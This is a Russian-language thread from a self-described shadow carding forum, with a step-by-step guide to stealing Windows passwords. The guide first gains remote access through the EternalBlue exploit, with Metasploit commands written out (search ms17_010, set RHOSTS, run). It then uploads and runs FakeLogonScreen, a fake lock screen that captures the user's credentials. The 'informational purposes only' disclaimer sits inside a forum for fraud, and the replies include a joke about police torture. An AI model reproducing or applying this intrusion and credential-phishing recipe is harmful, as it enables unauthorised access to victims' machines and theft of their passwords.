Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников.

Взлом пароля Windows с помощью FakeLogonScreen

Download_Link

Участник клуба
Регистрация
7 Июл 2020
Сообщения
318
Реакции
56
Депозит
200$
0e59971b67119de5d58c8.png


FakeLogonScreen — это утилита для имитации экрана входа в систему Windows с целью получения пароля пользователя. Введенный пароль проверяется в Active Directory или на локальном компьютере, чтобы убедиться в его правильности, а затем отображается на консоли или сохраняется на диск.
Инструмент FakeLogonScreen был создан Arris Huijgen. Он разработан на C#, поскольку позволяет различным фреймворкам внедрять утилиту в память. Мы будем удаленно запускать этот инструмент с помощью Metasploit для получения пароля пользователя в системе.

Демонстрация работы утилиты от разработчика:


demo.gif







ДИСКЛЕЙМЕР:

Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!



Сначала качаем FakeLogonScreen с GitHub:
https://github.com/bitsadmin/fakelogonscreen/releases

d1d7eaaad93bc4d233a8f.png



Получаем удалённый доступ к целевой системе (на примере уязвимости "EternalBlue"):
msfconsole

0ae388d612ba25db2533a.png



search ms17_010

77e0020e9e5b5ed2992a8.png



Выбираем подходящий эксплоит:
use 0

147f8a7da411ebe2b9cbc.png



Смотрим опции:
options

d9ce1f448dbda0222f46d.png



Настраиваем опции:
set RHOSTS 192.68.0.12

Запускаем работу эксплоита:

run

Если целевой компьютер имеет уязвимость к данной атаке - мы получим удалённый доступ.

Удаленно запускаем FakeLogonScreen, используя следующий набор команд в MSF:
upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

После выполнения он имитирует экран блокировки Windows для получения пароля от пользователя. Для этого этот инструмент будет отображать экран блокировки точно так, как он настроен, чтобы у пользователя не возникло подозрений, как показано на изображении ниже:

uv9Syl9-tn0jgY8q1eifreaezfSu4qwvATmRCFswX_gmhkLEva-aJ52019uz7HGuoworQKPglnLcCLT5bsoVYiZn.jpg



Он будет проверять учетные данные локально или с контроллера домена по мере их ввода пользователем, а затем отображать их на консоли.





 

Usman

Опытный user
Регистрация
18 Июн 2020
Сообщения
126
Реакции
4
ну я даже по гайду не разберусь все равно, для каких-то хацкеров
 

m_lyam

Опытный user
Регистрация
9 Июл 2020
Сообщения
819
Реакции
32
Usman написал(а):
ну я даже по гайду не разберусь все равно, для каких-то хацкеров
очень сложно, старые добрые ментовские пытки эффективнее)
 

Xanthias

Опытный user
Регистрация
3 Апр 2021
Сообщения
770
Реакции
61
Прикольная тема! Спасибо
 
Сверху Снизу